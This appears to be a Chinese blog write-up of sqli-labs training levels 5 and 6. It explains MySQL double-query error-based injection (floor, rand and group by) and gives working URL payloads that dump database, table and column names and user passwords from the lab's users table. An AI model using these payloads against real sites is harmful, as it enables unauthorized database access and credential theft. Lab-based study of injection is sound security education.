sqli-labs靶场5-6关(双查询注入)

最新推荐文章于 2025-04-12 14:08:44 发布
最新推荐文章于 2025-04-12 14:08:44 发布
阅读量401 收藏 3
点赞数 1
分类专栏: sqli-labs靶场 文章标签: mysql php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_46527080/article/details/111086669
版权

知识点

双查询注入的知识点
原理:双注入查询需要联合着MYSQL的BUG报错来进行报错注入
BUG:当在一个聚合函数,比如count函数后面如果使用分组语句就会把查询的一部分一错误形式显示出来;
双查询在命令行中直观显示出来

select  count(*),concat((select user()),(floor(rand() * 2))) as a from information_schema.tables group by a;

在这里插入图片描述

rand()函数     //随机函数
floor(a)        //取整函数
count()函数    //汇总函数
group by     //分组语句

1.rand()函数
在这里插入图片描述我们会发现rand函数查询出来的数是小于1的随机小数
2.floor(a)
在这里插入图片描述在这里插入图片描述floor这个函数,如果大于1就取1,如果小于1就取0
我的理解是这样
3.count()函数 //连接函数

 select concat((select database()));

在这里插入图片描述4.group by //分组函数

就是分组查询
使用GROUP BY可以将数据分为不同的组,再使用分组函数

在这里插入图片描述

第五关

源码分析

在这里插入图片描述这个源码和第一关的是一样的
1.判断注入点
?id=1’ and 1=2 --+ (报错)
?id=1’ and 1=1 --+ (回显正常)
存在’注入点
在这里插入图片描述2.判断列数

?id=1' order by 3 --+

在这里插入图片描述3.咱们再试试联合查询
不报错,但是也报不出什么内容
在这里插入图片描述一、爆库名
由于获取的随机数不一样,所以有的时候可能不会报错,有的时候返回是0,有的时候返回的是1

?id=1' union select 1,count(*),concat_ws('~',database(),floor(rand()*2)) as a from information_schema.tables group by a --+

在这里插入图片描述二、爆表名

?id=1' union select 1,count(*),concat_ws(':',(select table_name from information_schema.tables where table_schema=database() limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a --+

在这里插入图片描述如果想查询第二个表就将limit改成limit1,1,以此类推
limit的第一个位是从零开始查询,表示位数
第二个位是表示从查询的个数
在这里插入图片描述他的数据库表个数如下图
在这里插入图片描述三、爆字段

/?id=1' union select 1,count(*),concat_ws(':',(select column_name from information_schema.columns where table_name="users" limit 10,1),floor(rand()*2)) as a from information_schema.columns group by a --+

第9列是username
第10列是password
在这里插入图片描述在这里插入图片描述四、爆数据

?id=1' union select 1,count(*),concat_ws('~',(select username from users limit 2,1),floor(rand(0)*2)) as a from users group by a --+

在这里插入图片描述?id=1' union select 1,count(*),concat_ws('~',(select password from users limit 3,1),floor(rand(0)*2)) as a from users group by a --+

在这里插入图片描述

通过floor报错的方法来爆数据的本质是group by语句的报错。 group
by语句报错的原因是floor(random(0)*2)的不确定性,即可能为0也可能为1(group by
key的原理是循环读取数据的每一行,将结果保存于临时表中。读取每一行的key时,如果key存在于临时表中,则不在临时表中则更新临时表中的数据;
如果该key不存在于临时表中,则在临时表中插入key所在行的数据。group by
floor(random(0)*2)出错的原因是key是个随机数,检测临时表中key是否存在时计算了一下floor(random(0)*2)可能为0,如果此时临时表只有key为1的行不存在key为0的行,那么数据库要将该条记录插入临时表,由于是随机数,插时又要计算一下随机值,此时floor(random(0)*2)结果可能为1,就会导致插入时冲突而报错。即检测时和插入时两次计算了随机数的值。

第六关

源码分析
在这里插入图片描述很明显和上边的关卡有一个类似的,然后第一个变量$id是双引号,下边的查询语句没有任何字符包裹,那么闭合字符就是双引号(“”)
一、判断注入点:

在这里插入图片描述?id=1" --+
注释掉后面的发现不报错
所以闭合字符为双引号

在所有的sql注入的漏洞中,判断闭合字符和注释掉后面是关键,这就是找注入点
在这里插入图片描述找到注入点之后
中间的payload是和第五关一样的

总结双查询注入
判断完注入点之后
1.先构造第一个查询语句
union select 1,2,3 --+
然后将第二个查询语句依次插入第一个联合查询
【1中不插入任何数据】
【2 中插入count(*)聚合函数】
【3中插入构造的报错注入的语句
concat_ws(‘分割字符’,(查询语句limit 0,1),floor(rand()*2))
concat_ws //是将内容输出到屏幕上

sql报错注入原理分析
JacobTsang的博客
10-13 1392
研究人员发现,使用group by子句结合rand()函数以及像count(*)这样的聚合函数,在SQL查询时会出现错误,且错误是随机产生的,这就产生了双重查询注入。 到底为什么floor()rand(0)、count()、group by相结合,会产生这种错误呢?转载以前乌云一位哥的文章: 种子值为0的rand()函数的输出几乎固定为01101 Okay let get is strai...
于SQL报错注入原理详细解析
qq_45672254的博客
11-17 797
于SQL报错注入原理详细解析 之前读过多篇Mysql报错注入floor(rand(0)*2)报错原理探究的文章,都觉得原理阐述大同小异,但在具体细节上,还是不太明白,结合看过的文章和自己的理解,对SQL报错注入原理进行更细致的分析,身为一名网络安全小白,也是想和刚入门的同学一起研究sql注入原理,文章如果有错误的地方,希望大佬批评指正。有兴趣的同学可以查看此篇文章的链接,了解sql报错注入的一般原理:Mysql报错注入floor(rand(0)*2)报错原理探究 在报错原理分析中,主要困惑我的地方
SQL注入基本原理&&靶场实现
最新发布
qq_61231688的博客
04-12 1177
本文讲解SQL注入基本原理以及靶场(CTFSHOW)实现
详细讲解双查询注入
weixin_34138255的博客
03-22 395
上一篇文章中,http://leaver.me/archives/2726.html我说双查询很难讲清楚,这次就试着讲一下。读了一些原理性的东西。然后尽量通俗的给大家讲清楚。。在此之前,我们理解一下子查询,查询的键字是select,这个大家都知道。子查询可以简单的理解在一个select语句里还有一个select。里面的这个select语句就是子查询。看一个简单的例子:Sel...
sql注入之报错注入
weixin_45653478的博客
04-08 1437
报错注入的原理基于应用程序在处理数据库查询时产生的错误信息。当应用程序执行一个含有恶意SQL代码的查询时,如果查询出错(例如,由于语法错误或权限不足),数据库系统通常会返回一个错误信息给应用程序。当它的第二个参数不是一个合法的XPath表达式时,会引发错误,并可能返回包含攻击者所需信息的错误消息。在报错注入中,攻击者可能会构造特定的SQL语句,利用floor()函数的特性来触发错误,并从中获取数据库信息。:这也是MySQL的一个XML函数,用于改变(查找并替换)XML文档中符合条件的节点的值。
sql注入--双查询报错注入
老夏家的云
01-16 1139
sql注入双查询报错注入 背景:在sqli-labs第五时,即使sql语句构造成功页面也没有回显出我们需要的信息,看到了有使用双查询操作造成报错的方式获得数据库信息,于是研究了一下双查询的报错原理,总结了探索的过程,整理出此文希望可以帮到感兴趣的人。 sqli-labs游戏下载地址:https://github.com/Audi-1/sqli-labs 双查询报错注入 需用到四个函数和...
sqli-labs 靶场源码
01-06
通过在sqli-labs靶场中进行测试,安全研究人员和开发者可以对应用程序的SQL注入防护能力进行评估。此外,它也是一个优秀的学习工具,可以帮助初学者快速上手并深入理解SQL注入的攻击手段和防御策略。同时,这个靶场...
sqli-labs靶场
05-30
"sqli-labs靶场"是一个专门用于学习和测试SQL注入技术的平台,它提供了多种不同类型的SQL注入场景,帮助安全研究人员和开发人员了解并防御这种攻击。 在sqli-labs靶场中,用户可以实践各种SQL注入技巧,如错误注入...
Sqli-labs-maste 靶场的下载, phpStudy 下载
09-13
"Sqli-labs-maste"是一个专门设计用来练习和提高SQL注入技术的靶场环境,它提供了各种不同难度级别的SQL注入漏洞供用户尝试解决,从而帮助学习者深入理解SQL注入的原理和防御技术。 与此同时,"phpStudy"是一个流行...
phpstudy+靶场sqli-labs-master下载
11-08
6. **Sqli-Labs实战**:熟悉靶场的结构,逐级破解每个级别的挑战,通过实践学习如何识别和利用SQL注入漏洞,以及如何防止此类攻击。 7. **安全编程**:学习如何在PHP中编写安全的代码,如使用预编译语句(PDO或...
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
sql注入双查询注入
FXHQAQ的博客
02-14 757
在另外一篇文章中,用到了双查询注入,特在此详细讲解一下双查询注入。 另一篇文章传送门:sql注入那些事儿——如何优雅地进行SQL注入(3) 先大概说明一下双查询注入的原理和会用到的函数。 原理:简单的一句话原理就是有研究人员发现,当在一个聚合函数,比如count函数后面如果使用分组语句就会把查询的一部分以错误的形式显示出来。 函数说明: rand()是一个生成随机数的函数,他会返回0到1之...
mssql报错注入原理及流程实例
buffedon的博客
05-19 1263
mssql报错注入原理及流程实例mssql 报错注入1. 原理2. mssql 测试实例2.1 找注入2.2 判断类型2.3 获取信息获取数据库的数量获取数据库名获取表名获取列名获取列中的值 mssql 报错注入 1. 原理 在MSSQL中,数据类型不一样(例如1=‘1’)会报错,并且报错信息会在日志信息中显示出来;日志文件直接在网页上显示 利用此原理,进行构造 1=‘mssql语句’,返回报错信息 2. mssql 测试实例 2.1 找注入点 sql注入漏洞一般都在输入框,搜索框,域名地址
SQL注入之报错注入
2301_81242582的博客
09-02 732
两个不会:不会对用户输入内容进行检索,不会对输出内容进行检查。
SQL显错(union)注入基础深度剖析(原理)
m0_46304840的博客
03-03 2769
前言 前面基础应该写的差不多了,至于于编程语言我会后面再写 正文 什么是sql注入? sql注入 指 web应用程序没有对用户输入的数据进行判断,导致前端传入后端的参数 可以被攻击者所控制,并且带入数据库执行 $sql = "SELECT * FROM users where id = $GET['id']"; 因为这里的参数,id可以可以控制,所以会被攻击者进行拼接...
报错注入详解
热门推荐
weixin_45253622的博客
03-19 1万+
报错注入 报错注入是SQL注入的一种。 利用前提:页面上没有显示位,但是需要输出SQL语句执行错误信息。比如mysql_error() 优点:不需要显示位 缺点:需要输出mysql_error()的报错信息 报错函数 1、floor报错注入 floor()报错注入是利用count()rand()floor()、group by 这几个特定的函数结合在一起产生的注入漏洞,准确的说是floor,count,group by冲突报错。 报错原理:利用数据库表主键不能重复的原理,使用GROUP BY分组,产生主
sqli-labs Less-6(双注入
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-02 686
1、判断SQL语句是使用什么闭合的 使用双引号闭合。 2、判断有几个字段 payload ?id=1" order by 3 --+ 存在3个字段 3、爆出数据库版本和当前数据库名 payload ?id=1" union select 1,2,count(1) from information_schema.tables group by concat(floor(rand(0)*2),version()) --+ ?id=1" union select 1,2,count(1) from info
sql报错注入原理
m0_54525483的博客
07-22 1856
0x00:前言 于sql注入,经久不衰,现在的网站一般对sql注入的防护也相对加强了,2016年的渗透测试报告中,出现最多的是xss(跨站脚本攻击)和明文传输等,但是对sql注入的利用方式,也相对成熟,详细了解sql注入,可以参考之前的文章。http://wt7315.blog.51cto.com/10319657/1828167 今天主要分享下sql注入中的报错型,在大多网上的文章会列出类似于公式的句子,却没解释为什么要使用这样的函数,为什么使用这个函数会出现报错而导致sql注入。 ...
支持PHP7的sqli-labs靶场介绍
3. sqli-labs靶场sqli-labs是一个非常流行的在线学习平台,它提供了一个模拟的环境,其中包含了多个练习卡,每个卡都有一个或多个SQL注入漏洞等待用户发现和利用。通过逐个解决这些卡,学习者可以掌握SQL...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值